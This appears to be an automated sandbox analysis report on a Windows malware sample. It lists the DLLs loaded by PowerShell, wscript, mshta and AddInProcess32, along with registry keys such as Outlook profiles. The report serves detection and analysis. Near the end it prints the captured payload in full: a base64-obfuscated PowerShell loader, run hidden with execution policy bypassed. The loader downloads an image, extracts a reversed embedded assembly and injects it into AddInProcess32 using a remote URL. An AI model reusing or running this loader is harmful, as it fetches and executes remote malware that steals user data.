Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2155460515.0000000007B46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.2474342521.00000000074BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2472019316.0000000006FB0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2160113996.0000000008AC8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Windows\system32\TenantRestrictionsPlugin.dlle2s1t.pdb source: powershell.exe, 00000001.00000002.2277730748.0000000007679000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: q:C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.pdb source: powershell.exe, 00000001.00000002.2267939334.0000000005151000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.2474342521.00000000074BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2472019316.0000000006FB0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbQ source: powershell.exe, 00000003.00000002.2160113996.0000000008AC8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.2474342521.00000000074BB000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?

Obfuscated command line found

